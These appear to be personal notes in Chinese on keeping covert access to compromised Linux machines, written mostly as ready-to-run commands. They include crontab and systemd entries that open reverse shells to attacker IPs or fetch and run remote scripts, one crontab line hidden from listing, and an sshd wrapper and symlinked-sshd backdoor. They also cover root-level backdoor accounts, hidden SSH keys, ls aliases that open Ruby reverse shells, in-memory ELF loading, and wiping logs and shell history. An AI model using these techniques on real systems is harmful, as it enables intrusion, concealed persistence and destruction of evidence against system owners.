[TOC]
linux持久化笔记 随缘完善更新
tips
##查看机器配置
whoami&&lscpu&&free -h&&df -h&&lsb_release -a
##接shell
1
|
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
|
##别人写的自动化脚本
wget https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh
curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash
$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console
show payloads
use x
##pty
1
2
|
which python python2 python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
|
##痕迹清除
1
2
3
4
|
sed -i '/^101/d' /var/log/nginx/access.log&
rm -rf /var/log/* & history -c & rm -rf ~/.bash_history
rm -rf /var/log/auth.log /var/log/secure /var/log/faillog /var/log/lastlog /var/log/wtmp
|
##隐身登陆
1
2
3
4
5
6
|
ssh username@hostname "bash --noprofile --norc"
ssh -T username@host /bin/bash -i
ssh -o UserKnownHostsFile=/dev/null -T user@hostname
/bin/bash -if
|
##cf支持的端口
1
2
3
4
5
6
7
8
|
http端口 https端口
80 443
8080 2053
8880 2083
2052 2087
2082 2096
2086 8443
2095
|
##添账号
1
2
3
4
5
6
7
8
|
##查看root所在的组
groups root
useradd config
passwd config
usermod -aG sudo config
usermod -aG root config
echo 'config ALL=(ALL) ALL' >> /etc/sudoers
|
0. 内存执行ELF
优点:不落地匿名文件,好用
缺点:可以和其他技术结合起来,比如通过fexecve调用memfd_create创建的匿名文件句柄
demo: https://asciinema.org/a/173715
低版本glibc编译的文件可在高版本执行,低版本glibc编译的
1
2
3
4
5
|
## 版本
ldd --version
## ldd (GNU libc) 2.17 ten服务器的版本低
~/tmp/elfshell-glibc-2.17 kali:8880
exec.go ~/elf/exec.pl ~/tmp/sysConfig.pl 内容是:curl http://xxx/xxx|sh
|
mes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
# 放在后台。 但如下载文件等操作,执行完后elf会退出,不会循环执行
Ctrl+z
bg
1 ## 要执行命令的文件 可以替换demoshell,下载+设置ipoprt编译+在攻击机; linux命令用c编译。此文件可任意替换
https://gist.githubusercontent.com/magisterquis/ce8b99b42188f4517efb3e1038a483de/raw/cc9c2f96bc982b82ded64a734aeb850f73fd2f93/demoshell.go
go build -ldflags '--extldflags "-static -fpic"' -o elfshell ./demoshell.go
2 ## 写入elfload.pl
cat elfload.pl.head | tee elfload.pl
文件内容elfload.pl.head
'''
#!/usr/bin/env perl
use warnings;
use strict;
$|=1;
print "Making anonymous file...";
my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
die "memfd_create: $!";
}
print "fd $fd\n";
open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);
print "Writing ELF binary to memory...";
'''
3 ## elfsehll写进elfload.pl
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' elfshell >> elfload.pl
4 ## 尾部写入elfload.pl
cat elfload.pl.tail | tee -a elfload.pl
文件内容elfload.pl.tail
'''
print "done\n";
print "Here we go...\n";
exec {"/proc/$$/fd/$fd"} "formsec"
or die "exec: $!";
'''
5 ## exp
curl http://1.1.1.1/elfload.pl|perl
curl http://xxx/xxx.pl|perl
## 接shell
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
|
1. ssh wrapper后门
优点:无需编译,只有在连接后有进程
缺点:需要重启sshd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
#####一行vic
cd /usr/sbin/&&mv sshd ../bin/&&echo '#!/usr/bin/perl' >sshd&&echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd&&echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd&&chmod u+x sshd&&/etc/init.d/sshd restart
## vic
cd /usr/sbin/
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart
## att 连接
socat STDIO TCP4:vicIP:22,sourceport=13377
|
2. ssh 软连接 开后门ssh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
没成功
## new
cp /etc/pam.d/su /etc/pam.d/java
#cp /etc/pam.d/su postgres
ln -sf /usr/sbin/sshd /java;
#ln -sf /usr/sbin/sshd /postgres
/java -oPort=11212
#/postgres -oPort=5555
cp /etc/pam.d/su /etc/pam.d/java
ln -sf /usr/sbin/sshd /java;
/java -oPort=11212
## old
ln -sf /usr/sbin/sshd /tmp/su;
/tmp/su -oPort=11212
|
3. OpenSSH后门制作
4. 计划任务
crontab 文件通常位于以下目录中:
/var/spool/cron/crontabs/username
(对于基于 Debian/Ubuntu 的系统)
/var/spool/cron/tabs/username
(对于基于 Red Hat/CentOS 的系统)
普通,部署到当前用户
1
2
3
4
5
6
|
## 添加进当前用户的crontab文件中
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/2333 0>&1"; } | crontab -
#使用crontab -l 或cat时有隐藏效果
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/5555 0>&1;\rno crontab for `whoami`%100c\n")|crontab -
echo ' * */5 * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab
|
部署到/etc/crontab,5mins端口31337启动ssh守护进程
1
|
echo ' * */5 * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab
|
部署到/etc/cron.*/
1
2
3
4
5
|
##已经kali监听,内容为将“每分钟反弹到443”写进0hourly内+直接反弹到443
echo '*/1 * * * * root curl http://xxx/a|sh' >> /etc/cron.d/man-db
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/0hourly
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/man-db
|
at周期运行 只运行一次。不好用
1
2
3
4
5
6
7
8
|
echo "at now+1min <<EOF" >> /tmp/...
echo "bash /tmp/..." >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/192.168.44.123/10092 0>&1;" >> /tmp/...
at now+1min <<EOF
bash /tmp/...
EOF
|
at C2远程,不好用
1
2
3
4
5
6
7
8
9
10
11
12
13
|
#c2server
echo "at now+1min <<EOF" >> /tmp/...
echo "curl http://xxx/xxx | sh" >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/xxx/8080 0>&1;" >> /tmp/...
python3 -m http.server 80
#victim
at now+1min <<EOF
curl http://xxx/config | sh
EOF
at -f /xx/xx now + 1 minute
echo "curl http://xxx | sh" | at now + 1 minute
|
5. 后门账户
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
# 删用户
userdel -f xx
#shadow root后门账户 带sudo
useradd -u 0 -o -g root -G root -M -s /bin/bash config && echo "xxx" | passwd config --stdin
passwd config
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
#普通权限的后门账户,但是名字有很强的迷惑性,可用于挖矿,botnet等。
useradd -d /x -c "config" -s /bin/bash config -m、
useradd -d /home/... -s /bin/bash x -m
## CentOS 7系统命令行创建uid为0的用户
1. 直接创建
useradd -o -u 0 config && echo "xxx" | passwd config --stdin
2. 写入/root/.bashrc文件。与PROMPT_COMMAND结合,每次以root打开shell时都会执行
echo 'export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 config &>/dev/null && echo config:xxx | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"'>>/root/.bashrc
## Ubuntu系统命令行创建uid为0的用户
useradd -p 0 `openssl passwd -1 -salt 'abc' xxx` -u 0 -o -g root -G root -s /bin/bash config
|
6. pubKey
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
## 修改/etc/ssh/sshd_config中的AuthorizedKeysFile字段,隐藏真正的公钥
cat /etc/ssh/sshd_config|grep AuthorizedKeysFile
AuthorizedKeysFile .cache
echo "AuthorizedKeysFile .cache" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
#others_user
mkdir -p ~/.cache
ln /root/.ssh/authorized_keys ~/.cache/ssh.rc
#target_user
mkdir -p ~${target_user}/.cache
echo -e "\n\nxxxxxxx\n\n" >> ~/.cache/ssh.rc
#正常用户的免密公钥也能正常使用,只需要有针对性地维护目标用户
|
7. 别名后门
优点:隐藏得深 ,但命令或网络情况复杂会延迟,会被发现
缺点:需要机会,对方执行yum更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
## ruby实现反弹连接 nc
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
## ruby实现反弹连接 msf
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end';};alerts"
## 创建alias和unalias的别名,加入隐蔽的位置,执行ls自动反弹 vi /etc/yum/yum-update.rc
cat > /etc/yum/yum-update.rc <<EOF
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias="cat /tmp/.alias.txt"
EOF
将下面的加入/tmp/.alias.txt
cat > /tmp/.alias.txt <<EOF
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
EOF
cd /etc/yum/&&touch -acmr version-groups.conf yum-update.rc
## hash后门
#当执行ls时会发现变成执行了pwd
echo "hash -p /usr/bin/pwd ls" >> /etc/profile
## 不好用 echo "hash -p 'useradd -o -u 0 config && echo "'"'"xxx"'"'" | passwd config --stdin' ls" >> /etc/profile
|
8.systemd服务后门
优点:不看文件不容易被发现
缺点:需要机会
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
不成功
1. ## 系统重启开bash
cat > /usr/lib/systemd/system/config.service <<EOF
[Unit]
Description=Systemctl Config.
After=network.target
[Service]
Type=forking
ExecStart=curl http://xxx/xxx.pl|perl
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable config
systemctl start config
2. ## 类定时任务
cat > /usr/lib/systemd/system/guard.service <<EOF
[Unit]
Description=guard
After=network.target
[Service]
Type=forking
ExecStart=curl http://xxx/xxx.pl|perl
Restart=always
RestartSec=12s
[Install]
WantedBy=default.target
EOF
systemctl daemon-reload
systemctl enable guard
systemctl start guard
|
9. PAM后门制作
Linux Pam后门总结拓展 - 先知社区
10. rootkit
自动化脚本
偷账户密码还是使用PAM后门或者OpenSSH编译后门更为稳定且不易发现